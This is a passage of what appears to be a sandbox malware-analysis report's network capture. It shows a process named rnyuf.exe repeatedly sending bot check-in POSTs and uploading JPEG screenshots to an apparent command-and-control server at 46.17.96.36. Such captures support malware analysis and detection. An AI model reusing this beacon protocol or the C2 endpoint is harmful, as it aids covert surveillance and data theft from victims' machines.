                                        Aug 29, 2021 22:28:23.228679895 CEST15065OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:23.264576912 CEST15067OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:23.264925003 CEST15073OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:23.264974117 CEST15083OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:23.265063047 CEST15085OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:23.265103102 CEST15090OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:23.300180912 CEST15093OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:23.300221920 CEST15096OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:23.420929909 CEST15160INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0
                                        Aug 29, 2021 22:28:23.442090034 CEST15160OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:23.519581079 CEST15161INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        23192.168.2.44975846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:19.126745939 CEST3499OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:19.126841068 CEST3499OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:19.127017021 CEST3509OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:19.127147913 CEST3512OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:19.165009022 CEST3525OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:19.165383101 CEST3532OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:19.165479898 CEST3537OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:19.203278065 CEST3545OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:19.203361034 CEST3564OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:19.203380108 CEST3569OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:19.203402996 CEST3574OUTData Raw: 19 f8 79 ce 5e 07 56 3d 4f 97 5e 6c 2a e2 29 d5 9c fd 9b d4 f5 6a 61 f0 d5 68 c2 0a a5 ac 71 29 a6 dd b9 f9 6d e4 3f f0 1a b2 9e 1f d4 1f fe 58 10 3d f8 ae 92 6d 73 48 bc 07 ec da c3 5b 7b 3c 78 ac e9 ed ae ae 01 6b 6f 11 43 2a 9e db f6 d7 42 c6
                                        Data Ascii: y^V=O^l*)jahq)m?X=msH[{<xkoC*BU{_TI`)gTO]dh{J<?og\ZtQfyS^J>tb[G9EJN~>lJ_Q0LoQaq\y5KK4:9<aNO
                                        Aug 29, 2021 22:27:19.317240953 CEST3606INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        230192.168.2.44996946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:23.736783981 CEST15162OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:23.814192057 CEST15252INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        231192.168.2.44997046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:23.738125086 CEST15162OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:23.738235950 CEST15162OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:23.738414049 CEST15172OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:23.738539934 CEST15175OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:23.770615101 CEST15178OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:23.770653963 CEST15181OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:23.770663977 CEST15183OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:23.770878077 CEST15195OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:23.770905018 CEST15198OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:23.770911932 CEST15201OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:23.803239107 CEST15203OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:23.918560982 CEST15271INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        232192.168.2.44997146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:24.011387110 CEST15272OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:24.090118885 CEST15272INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        233192.168.2.44997246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:28.312150955 CEST15273OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:28.394027948 CEST15312INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:28 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        234192.168.2.44997346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:28.339996099 CEST15273OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:28.340094090 CEST15274OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:28.340269089 CEST15284OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:28.340393066 CEST15286OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:28.378813982 CEST15289OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
